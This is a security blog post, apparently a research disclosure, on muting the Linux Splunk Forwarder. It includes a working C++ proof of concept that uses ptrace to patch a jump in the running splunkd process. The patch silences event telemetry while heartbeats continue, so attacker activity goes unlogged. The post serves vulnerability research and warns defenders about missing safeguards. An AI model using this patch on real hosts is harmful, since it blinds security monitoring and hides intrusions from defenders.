<!DOCTYPE html>
<html lang="en-us">

<head>
     
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <title>ShhPlunk: Muting the Splunk Forwarder</title>
    <style>

    html body {
        font-family: 'Raleway', sans-serif;
        background-color: white;
    }

    :root {
        --border-width:  5px ;
    }

</style>





<link rel="stylesheet" href="https://bananamafia.dev//css/font.css">


 <link rel="stylesheet" href="https://bananamafia.dev//css/solarized-dark.min.css"> 


<link rel="stylesheet" href="https://bananamafia.dev//css/bootstrap-min.css" integrity="">


<link rel="stylesheet" href="https://bananamafia.dev//css/main.css">


<link rel="stylesheet" href="https://bananamafia.dev//css/font-awesome.min.css" integrity="">

 


<script src="/js/highlight.min.js"></script>


<script src="/js/python.min.js"></script> 
<script src="/js/cpp.min.js"></script> 
<script src="/js/json.min.js"></script> 
<script src="/js/go.min.js"></script> 

<script>
  hljs.initHighlightingOnLoad();
</script>




<script async src="https://www.googletagmanager.com/gtag/js?id=UA-143157939-1"></script>
<script>
  window.dataLayer = window.dataLayer || [];
  function gtag() { dataLayer.push(arguments); }
  gtag('js', new Date());

  gtag('config', 'UA-143157939-1');
</script>





















<script src="/js/jquery.min.js"></script>


<script src="/js/bootstrap.min.js"></script>


<script>$(document).on('click', function () { $('.collapse').collapse('hide'); })</script>


<script src="/js/confetti.browser.js"></script> <meta name="generator" content="Hugo 0.111.3">
    

    
</head>




<body>
     
    <nav class="navbar navbar-default navbar-fixed-top">

        <div class="container">

            <div class="navbar-header">

                <a class="navbar-brand visible-xs" href="#">ShhPlunk: Muting the Splunk Forwarder</a>

                <button class="navbar-toggle" data-target=".navbar-collapse" data-toggle="collapse">
                    <span class="icon-bar"></span>
                    <span class="icon-bar"></span>
                    <span class="icon-bar"></span>
                </button>

            </div>

            <div class="collapse navbar-collapse">

                
                <ul class="nav navbar-nav">
                    
                    <li><a href="/">Home</a></li>
                    
                    <li><a href="/post/">Posts</a></li>
                    
                    <li><a href="/project/">Projects</a></li>
                    
                    <li><a href="/recipe/">Recipes</a></li>
                    
                </ul>
                

                
                <ul class="nav navbar-nav navbar-right">
                    
                    <li class="navbar-icon"><a href="mailto:banana-#@#-bananamafia.dev"><i class="fa fa-envelope-o"></i></a></li>
                    
                    <li class="navbar-icon"><a href="https://github.com/ps1337/"><i class="fa fa-github"></i></a></li>
                    
                    <li class="navbar-icon"><a href="https://twitter.com/CaptnBanana"><i class="fa fa-twitter"></i></a></li>
                    
                    <li class="navbar-icon"><a href="/index.xml"><i class="fa fa-rss"></i></a></li>
                    
                    <li class="navbar-icon"><a href=""><i class="fa fa-toggle-off"></i></a></li>
                    
                    <li class="navbar-icon"><a href="https://www.youtube.com/watch?v=ao2GL3NAWQU"><i class="fa fa-envira"></i></a></li>
                    
                </ul>
                

            </div>

        </div>

    </nav>


    <script>
        
        
        

        
        $(".fa-toggle-off, .fa-toggle-on").parent().removeAttr("href");

        
        window.onload = setMode();

        function isLightMode() {

            const currentTheme = localStorage.getItem('bananamafia_theme') ? localStorage.getItem('bananamafia_theme') : null;

            if (currentTheme == "light" || currentTheme == null) {
                return true;
            }
            else {
                return false;
            }
        }

        function setMode() {
            if (isLightMode()) {
                setLight();
            }
            else {
                setDark();
            }
        }

        function setDark() {
            document.documentElement.setAttribute('data-theme', 'dark');
            localStorage.setItem('bananamafia_theme', 'dark');

            $(".fa-toggle-off").each(function (i) {
                $(this).removeClass("fa-toggle-off");
                $(this).addClass("fa-toggle-on");
            });
            setAltImgs();
        }

        function setLight() {
            document.documentElement.setAttribute('data-theme', 'light');
            localStorage.setItem('bananamafia_theme', 'light');

            $(".fa-toggle-on").each(function (i) {
                $(this).removeClass("fa-toggle-on");
                $(this).addClass("fa-toggle-off");
            });
            setAltImgs();
        }

        function setAltImgs() {
            var lightMode = isLightMode();
            $(".alt-img").each(function (idx) {
                if (lightMode) {
                    
                    var newSrc = $(this).attr("src").replace("_dark", "");
                }
                else {
                    
                    var imgExt = $(this).attr("src").split(".").pop();
                    var newSrc = $(this).attr("src").substr(0, $(this).attr("src").lastIndexOf(".")) + "_dark." + imgExt;
                }

                $(this).fadeOut(250, function () {
                    $(this).attr("src", newSrc);
                });
                $(this).fadeIn(250);
            });
        }

        $(".fa-toggle-off, .fa-toggle-on").on("click", function () {
            const currentTheme = localStorage.getItem('bananamafia_theme') ? localStorage.getItem('bananamafia_theme') : null;
            $("body").addClass("transition-bg");
            $("nav").addClass("transition-bg");
            if (currentTheme == "dark") {
                setLight();
            } else {
                setDark();
            }

            setTimeout(function () {
                $("body").removeClass("transition-bg");
                $("nav").removeClass("transition-bg");
            }, 500);

        });

        $(document).ready(function () {
            
            $(".fa-envira").parent().mouseenter(function () {
                confetti.reset();

                confetti({
                    useWorker: true,
                    particleCount: 200,
                    angle: 90,
                    spread: 70,
                    origin: {
                        x: 0.5, y: 1
                    },
                    startVelocity: 60
                });
            });
            setAltImgs();
        });
    </script>


<main id="main">

    <div class="item">

    
    
    

    

    <h4><a href="/post/shhplunk/">ShhPlunk: Muting the Splunk Forwarder</a></h4>
    <h5></h5>
    
    <a href="https://bananamafia.dev/tags/reverse-engineering"><kbd class="item-tag">reverse-engineering</kbd></a>
    
    <a href="https://bananamafia.dev/tags/c&#43;&#43;"><kbd class="item-tag">c&#43;&#43;</kbd></a>
    
    <a href="https://bananamafia.dev/tags/linux"><kbd class="item-tag">linux</kbd></a>
    

</div>


    <br>
    <div class="content-width text-justify"><p>Many organizations rely on Splunk and its Splunk Forwarder to deliver event data as a sole source of telemetry. For quite some time, I&rsquo;ve wondered if it&rsquo;s possible to mute the Splunk Forwarder&rsquo;s <code>splunkd</code> process, so that no event data reaches the respective endpoint. Technically, this should be possible, once the required privileges are granted on a system. Therefore, I&rsquo;ve decided to take a look at this. While Splunk Forwarder is available for various platforms, I&rsquo;ve targeted the Linux version. This means that you need permissions to <code>ptrace</code> the <code>splunkd</code> process to be able to do any modifications.</p>
<p>A quick analysis in a disassembler showed that there exist several threads that are being used to transmit data, with two of them being:</p>
<ul>
<li>The heartbeat thread that transmits regular events. This data is available in the <code>_internal</code> index.</li>
<li>The thread that&rsquo;s responsible for sending actual event data.</li>
</ul>
<p>As an attacker, it&rsquo;s obvious to target the latter, while keeping the heartbeat thread intact. If there would be a way to keep events from being sent, any executed commands used for local reconnaissance or exploitation would be invisible for defenders, since no telemetry is available. Here&rsquo;s what the event sending thread looks like in a disassembler:</p>
<center>
<img width="75%" src="/img/shhplunk/disasm.png">
</center>
<p>As can be seen above, a simple patch of the <code>if</code>-statement (<code>je</code> instruction) would force <code>splunkd</code> to always enter an error condition that occurs in case the event receiver isn&rsquo;t reachable. Note that this does not touch the heartbeat thread. The <code>je</code> instruction can be replaced with a <code>nop</code> and <code>jmp</code> instruction to keep the alignment in place. Of course, each version of <code>splunkd</code> is different and so is the offset to the instruction to be patched. To counter this, I&rsquo;ve generated a signature of the surrounding bytes, which worked on the latest two versions at the time of writing this article. As a simple proof of concept, I came up with the following code:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-cpp" data-lang="cpp"><span style="display:flex;"><span><span style="color:#75715e">// get PIDs of all splunkd processes (in case there are multiple)
</span></span></span><span style="display:flex;"><span><span style="color:#75715e"></span><span style="color:#66d9ef">auto</span> PIDs <span style="color:#f92672">=</span> get_pids();
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">uint64_t</span> offset <span style="color:#f92672">=</span> <span style="color:#ae81ff">0</span>;
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#75715e">// pattern for instruction to patch
</span></span></span><span style="display:flex;"><span><span style="color:#75715e">// 0F84?0000?80BBA000000000
</span></span></span><span style="display:flex;"><span><span style="color:#75715e"></span>std<span style="color:#f92672">::</span>vector<span style="color:#f92672">&lt;</span><span style="color:#66d9ef">unsigned</span> <span style="color:#66d9ef">char</span><span style="color:#f92672">&gt;</span> pattern_vec <span style="color:#f92672">=</span> {<span style="color:#ae81ff">0x0F</span>, <span style="color:#ae81ff">0x84</span>, <span style="color:#ae81ff">0xAA</span>, <span style="color:#ae81ff">0x00</span>, <span style="color:#ae81ff">0x00</span>, <span style="color:#ae81ff">0xAA</span>, <span style="color:#ae81ff">0x80</span>, <span style="color:#ae81ff">0xBB</span>, <span style="color:#ae81ff">0xA0</span>, <span style="color:#ae81ff">0x00</span>, <span style="color:#ae81ff">0x00</span>, <span style="color:#ae81ff">0x00</span>, <span style="color:#ae81ff">0x00</span>};
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">for</span>(<span style="color:#66d9ef">auto</span> it<span style="color:#f92672">=</span>PIDs.begin(); it <span style="color:#f92672">!=</span> PIDs.end(); it<span style="color:#f92672">++</span>) {
</span></span><span style="display:flex;"><span>    pid_t PID <span style="color:#f92672">=</span> <span style="color:#f92672">*</span>it;
</span></span><span style="display:flex;"><span>    std<span style="color:#f92672">::</span>cout <span style="color:#f92672">&lt;&lt;</span> <span style="color:#e6db74">&#34;Using PID: &#34;</span> <span style="color:#f92672">&lt;&lt;</span> PID <span style="color:#f92672">&lt;&lt;</span> std<span style="color:#f92672">::</span>endl;
</span></span><span style="display:flex;"><span>    std<span style="color:#f92672">::</span>string splunk_path <span style="color:#f92672">=</span> do_readlink(<span style="color:#e6db74">&#34;/proc/&#34;</span> <span style="color:#f92672">+</span> std<span style="color:#f92672">::</span>to_string(PID) <span style="color:#f92672">+</span> <span style="color:#e6db74">&#34;/exe&#34;</span>);
</span></span><span style="display:flex;"><span>    std<span style="color:#f92672">::</span>cout <span style="color:#f92672">&lt;&lt;</span> <span style="color:#e6db74">&#34;splunkd binary is at &#34;</span> <span style="color:#f92672">&lt;&lt;</span> splunk_path <span style="color:#f92672">&lt;&lt;</span> std<span style="color:#f92672">::</span>endl;
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>    <span style="color:#75715e">// determine offset of instruction by a pattern scan
</span></span></span><span style="display:flex;"><span><span style="color:#75715e"></span>    <span style="color:#66d9ef">if</span>(offset <span style="color:#f92672">==</span> <span style="color:#ae81ff">0</span>) {
</span></span><span style="display:flex;"><span>        offset <span style="color:#f92672">=</span> scan(splunk_path, pattern_vec);
</span></span><span style="display:flex;"><span>    }
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>    <span style="color:#75715e">// get base address of process by PID
</span></span></span><span style="display:flex;"><span><span style="color:#75715e"></span>    <span style="color:#66d9ef">void</span> <span style="color:#f92672">*</span>addr <span style="color:#f92672">=</span> get_base(PID) <span style="color:#f92672">+</span> offset;
</span></span><span style="display:flex;"><span>    <span style="color:#66d9ef">unsigned</span> <span style="color:#66d9ef">char</span> resBuf[<span style="color:#ae81ff">8</span>];
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>    ptrace(PTRACE_ATTACH, PID, <span style="color:#ae81ff">0</span>, <span style="color:#ae81ff">0</span>);
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>    <span style="color:#66d9ef">union</span> <span style="color:#a6e22e">u</span>{
</span></span><span style="display:flex;"><span>        <span style="color:#66d9ef">long</span> <span style="color:#66d9ef">int</span> val;
</span></span><span style="display:flex;"><span>        <span style="color:#66d9ef">char</span> chars[<span style="color:#ae81ff">8</span>];
</span></span><span style="display:flex;"><span>    } data;
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>    <span style="color:#66d9ef">int</span> bufferLength <span style="color:#f92672">=</span> <span style="color:#66d9ef">sizeof</span>(data.chars);
</span></span><span style="display:flex;"><span>    data.val <span style="color:#f92672">=</span> ptrace(PTRACE_PEEKDATA, PID, addr, NULL);
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>    std<span style="color:#f92672">::</span>vector<span style="color:#f92672">&lt;</span><span style="color:#66d9ef">unsigned</span> <span style="color:#66d9ef">char</span><span style="color:#f92672">&gt;</span> res(data.chars, data.chars <span style="color:#f92672">+</span> bufferLength);
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>    std<span style="color:#f92672">::</span>cout <span style="color:#f92672">&lt;&lt;</span> <span style="color:#e6db74">&#34;reading @ &#34;</span> <span style="color:#f92672">&lt;&lt;</span> addr <span style="color:#f92672">&lt;&lt;</span> std<span style="color:#f92672">::</span>endl;
</span></span><span style="display:flex;"><span>    <span style="color:#66d9ef">for</span>(<span style="color:#66d9ef">auto</span> it<span style="color:#f92672">=</span>res.begin(); it<span style="color:#f92672">!=</span>res.end(); it<span style="color:#f92672">++</span>) {
</span></span><span style="display:flex;"><span>        std<span style="color:#f92672">::</span>cout <span style="color:#f92672">&lt;&lt;</span> std<span style="color:#f92672">::</span>hex <span style="color:#f92672">&lt;&lt;</span> (<span style="color:#66d9ef">int</span>)<span style="color:#f92672">*</span>it <span style="color:#f92672">&lt;&lt;</span> std<span style="color:#f92672">::</span>dec;
</span></span><span style="display:flex;"><span>    }
</span></span><span style="display:flex;"><span>    std<span style="color:#f92672">::</span>cout <span style="color:#f92672">&lt;&lt;</span> std<span style="color:#f92672">::</span>endl;
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>    std<span style="color:#f92672">::</span>cout <span style="color:#f92672">&lt;&lt;</span> <span style="color:#e6db74">&#34;patching @ &#34;</span> <span style="color:#f92672">&lt;&lt;</span> addr <span style="color:#f92672">&lt;&lt;</span> std<span style="color:#f92672">::</span>endl;
</span></span><span style="display:flex;"><span>    std<span style="color:#f92672">::</span>vector<span style="color:#f92672">&lt;</span><span style="color:#66d9ef">unsigned</span> <span style="color:#66d9ef">char</span><span style="color:#f92672">&gt;</span> toWrite <span style="color:#f92672">=</span> res;
</span></span><span style="display:flex;"><span>    toWrite[<span style="color:#ae81ff">0</span>] <span style="color:#f92672">=</span> <span style="color:#ae81ff">0x90</span>; <span style="color:#75715e">// nop
</span></span></span><span style="display:flex;"><span><span style="color:#75715e"></span>    toWrite[<span style="color:#ae81ff">1</span>] <span style="color:#f92672">=</span> <span style="color:#ae81ff">0xe9</span>; <span style="color:#75715e">// jmp
</span></span></span><span style="display:flex;"><span><span style="color:#75715e"></span>    <span style="color:#66d9ef">int</span> i <span style="color:#f92672">=</span> <span style="color:#ae81ff">0</span>;
</span></span><span style="display:flex;"><span>    <span style="color:#66d9ef">for</span>(<span style="color:#66d9ef">auto</span> it <span style="color:#f92672">=</span> toWrite.begin(); it<span style="color:#f92672">!=</span>toWrite.end(); it<span style="color:#f92672">++</span>) {
</span></span><span style="display:flex;"><span>        ptrace(PTRACE_POKEDATA, PID, addr <span style="color:#f92672">+</span> i, <span style="color:#f92672">*</span>it);
</span></span><span style="display:flex;"><span>        i<span style="color:#f92672">++</span>;
</span></span><span style="display:flex;"><span>    }
</span></span><span style="display:flex;"><span>    ptrace(PTRACE_CONT, PID, <span style="color:#ae81ff">0</span>, <span style="color:#ae81ff">0</span>);
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>    std<span style="color:#f92672">::</span>cout <span style="color:#f92672">&lt;&lt;</span> <span style="color:#e6db74">&#34;Done.&#34;</span> <span style="color:#f92672">&lt;&lt;</span>  std<span style="color:#f92672">::</span>endl;
</span></span><span style="display:flex;"><span>}
</span></span></code></pre></div><p><em>The full PoC can be found in <a href="https://github.com/threathunters-io/ShhPlunk">the threathunters-io GitHub repository</a></em>.</p>
<p>This code targets each <code>splunkd</code> process running on the local machine. After executing this, no event data will be transferred, while heartbeats will continue working. Note that you need to use <code>ptrace</code> for this, since other syscalls like <code>process_vm_writev</code> can&rsquo;t be used to alter code while the process is running. You could also patch the binary itself, but that&rsquo;s another story. All tests were performed with version <code>9.0.1</code> of the Splunk Forwarder.</p>
<p>What do we learn from this experiment?</p>
<ul>
<li>The <code>splunkd</code> process can be altered by users with the right permissions.</li>
<li>There are no countermeasures implemented in the Splunk Forwarder to prevent this kind of manipulation.</li>
<li>The manipulation can be carried out before <code>splunkd</code> even manages to report the usage of <code>ptrace</code>.</li>
<li>You should not rely on <code>splunkd</code>&rsquo;s own heartbeats to determine if a host is still up and running correctly.</li>
</ul>
<hr>
<center>
<img width="30%" src="/img/shhplunk/yolo.png" class="alt-img">
</center>
</div>

    
    

    

    <h4 id="related" class="page-header">Related</h4>

     <div class="item">

    
    
    

    

    <h4><a href="/post/cs-aimbot-wallhax/">Game Hacking #5: Hacking Walls and Particles</a></h4>
    <h5></h5>
    
    <a href="https://bananamafia.dev/tags/reverse-engineering"><kbd class="item-tag">reverse-engineering</kbd></a>
    
    <a href="https://bananamafia.dev/tags/c&#43;&#43;"><kbd class="item-tag">c&#43;&#43;</kbd></a>
    
    <a href="https://bananamafia.dev/tags/binary"><kbd class="item-tag">binary</kbd></a>
    
    <a href="https://bananamafia.dev/tags/gamehacking"><kbd class="item-tag">gamehacking</kbd></a>
    

</div>
  <div class="item">

    
    
    

    

    <h4><a href="/post/satisfyer/">Analysis of Satisfyer Toys: Discovering an Authentication Bypass with r2 and Frida</a></h4>
    <h5></h5>
    
    <a href="https://bananamafia.dev/tags/radare2"><kbd class="item-tag">radare2</kbd></a>
    
    <a href="https://bananamafia.dev/tags/r2"><kbd class="item-tag">r2</kbd></a>
    
    <a href="https://bananamafia.dev/tags/frida"><kbd class="item-tag">frida</kbd></a>
    
    <a href="https://bananamafia.dev/tags/r2frida"><kbd class="item-tag">r2frida</kbd></a>
    
    <a href="https://bananamafia.dev/tags/reverse-engineering"><kbd class="item-tag">reverse-engineering</kbd></a>
    
    <a href="https://bananamafia.dev/tags/web"><kbd class="item-tag">web</kbd></a>
    
    <a href="https://bananamafia.dev/tags/vulnerability"><kbd class="item-tag">vulnerability</kbd></a>
    

</div>
  <div class="item">

    
    
    

    

    <h4><a href="/post/hisensehax/">Haxxoring a Hisense Smart TV</a></h4>
    <h5></h5>
    
    <a href="https://bananamafia.dev/tags/exploitation"><kbd class="item-tag">exploitation</kbd></a>
    
    <a href="https://bananamafia.dev/tags/reverse-engineering"><kbd class="item-tag">reverse-engineering</kbd></a>
    
    <a href="https://bananamafia.dev/tags/vulnerability"><kbd class="item-tag">vulnerability</kbd></a>
    

</div>
 

    

</main>
<footer id="footer">
    <img style="width:42vh" src="/img/tag.png" class="alt-img" id="mafia-tag">

    <p class="copyright text-muted">

        © All rights reserved. Powered by <a href="https://gohugo.io">Hugo</a> and <a href="https://github.com/calintat/minimal">Minimal</a>
    </p>
</footer>
</body>

<script>
    var footerWidth = 200;
    $(document).ready(function () {
        setWidth();
        $(window).bind("resize", setWidth);
    });

    $(window).on('load', function () {
        setWidth();
    });

    function setWidth() {
        footerWidth = $("main").width();

        $("#footer").css("min-width", (footerWidth > 300 ? footerWidth : 300) + "px");
        
    }

    $(window).on('resize', function () {
        setWidth();
    });

</script>

</html>


<script>
    var width = 200;
    $(document).ready(function () {
        setMaxWidth();
        $(window).bind("resize", setMaxWidth);
    });


    function setMaxWidth() {
        $("pre > code").css("display", "none");
        $("pre").css("display", "none");

        width = $("#related").width();

        $("pre > code").css("display", "block");
        $("pre").css("display", "block");

        $("pre > code").css("maxWidth", (width) + "px");
        $("pre").css("maxWidth", (width) + "px");
    }

    $(window).on('resize', function () {
        setMaxWidth();
    });

    $(window).on('load', function () {
        setMaxWidth();
    });



</script>